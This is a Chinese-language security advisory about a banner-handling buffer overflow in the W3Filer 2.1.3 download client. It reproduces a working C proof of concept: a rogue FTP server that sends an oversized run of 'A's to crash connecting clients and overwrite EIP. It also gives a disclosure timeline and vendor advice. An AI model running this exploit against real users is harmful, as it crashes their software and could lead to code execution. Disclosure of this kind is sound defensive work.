安全研究
安全漏洞
W3Filer Banner处理远程缓冲区溢出漏洞
发布日期:2007-06-29
更新日期:2007-07-02
受影响系统:
Satyavrat Mehrotra W3Filer 2.1.3描述:
BUGTRAQ ID: 24709
W3Filer是一款小型的文件下载工具。
W3Filer在处理超长的Banner返回数据时存在漏洞,远程攻击者可能利用漏洞导致工具崩溃。
如果W3Filer客户端在试图发送文件时接收了很大的banner,就会触发缓冲区溢出,导致僵死,用户必须杀掉进程;或应用程序会立即崩溃。
<*来源:r0ut3r (writ3r@gmail.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
W3Filer Buffer Overflow Vulnerability
DoS POC
r0ut3r (writ3r [at] gmail.com)
Version: 2.1.3
Description: If the client recieves a large banner when
attempting to send a file the application will freeze,
resulting in the user having to kill the application.
Alternatively the application will immediately crash with
an exception report. Either one of the above happens. The
EIP is overwritten with A's. Version 3.1.3 is not vulnerable.
Timeline:
06/27/2007 - Vulnerability discovered
06/28/2007 - Contacted vendor
06/29/2007 - Public release
This is dedicated to Jeremy Hammond
http://en.wikipedia.org/wiki/Jeremy_Hammond
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define PORT 21
int s, c;
struct sockaddr_in sock_addr;
int main()
{
char evilbuf[1500];
s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sock_addr.sin_family = PF_INET;
sock_addr.sin_addr.s_addr = htonl(INADDR_ANY);
sock_addr.sin_port = htons(PORT);
bind(s, (struct sockaddr *)&sock_addr, sizeof(sock_addr));
printf("[+] Listening...\n");
listen(s, 5);
printf("[*] Waiting for client\n");
c = accept(s, NULL, NULL);
printf("[!] Client connected\n");
memset(evilbuf,'A',1500);
memcpy(evilbuf,"220 ",4);
memcpy(evilbuf+1497,"\r\n\0",3);
printf("[+] Attempting buffer overflow\n");
if (send(c, evilbuf, strlen(evilbuf), 0) == -1)
{
printf("[-] Error sending..\n");
return 1;
}
printf("[+] Sent! did it crash?\n");
return 0;
}
建议:
厂商补丁:
Satyavrat Mehrotra
------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.smehrsoft.com/
浏览次数:2680
严重程度:0(网友投票)
绿盟科技给您安全的保障